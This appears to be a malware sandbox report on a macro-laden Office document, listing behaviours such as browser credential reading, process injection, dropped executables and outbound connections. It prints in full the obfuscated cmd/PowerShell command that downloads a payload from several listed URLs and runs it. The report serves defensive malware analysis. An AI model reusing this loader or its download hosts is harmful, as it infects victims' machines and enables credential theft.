VTI Score | 100 / 100
VTI Database Version | 2.6
VTI Rule Match Count | 24
VTI Rule Type | Documents
Browser | Read data related to browsing history | Read the browsing history for "Microsoft Internet Explorer".
File System | Handle with malicious files | File "c:\users\public\3292.exe" is a known malicious file.
Information Stealing | Read browser data | Possibly trying to read out browser credentials.
Injection | Write into memory of a process running from a created or modified executable | "c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe" modifies memory of "c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe"
| Modify control flow of a process running from a created or modified executable | "c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe" alters context of "c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe"
Network | Download data | URL "www.indpts.com/UHSD/".
| | URL "173.201.20.6".
| | URL "159.203.94.198".
| Perform DNS request | Resolve host name "www.indpts.com".
| Connect to remote host | Outgoing TCP connection to host "108.163.227.35:80".
| Connect to HTTP server | URL "173.201.20.6".
| | URL "159.203.94.198".
| | URL "www.indpts.com/UHSD/".
PE | Execute dropped PE file | Execute dropped file "c:\users\public\3292.exe".
| Drop PE file | Drop file "c:\users\public\3292.exe".
Process | Create process |
Create process "CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host 
uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) ".
| | Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
| | Create process "C:\Users\Public\3292.exe".
| | Create process "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe".
| | Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp"".
| | Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp"".
| | Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp"".
| Create system object | Create mutex with name "Global\.net clr networking".
| | Create mutex with name "Global\I705BA84C".
| | Create mutex with name "Global\M705BA84C".
VBA Macro | Execute application | VBA.Shell$ QiiPPcnDM, 0
| Execute macro on specific worksheet event | Execute macro on "Activate Workbook" event.
- | Anti Analysis | |
- | Device | |
- | OS | |
- | Hide Tracks | |
- | Kernel | |
- | Masquerade | |
- | Persistence | |
- | User | |
- | YARA |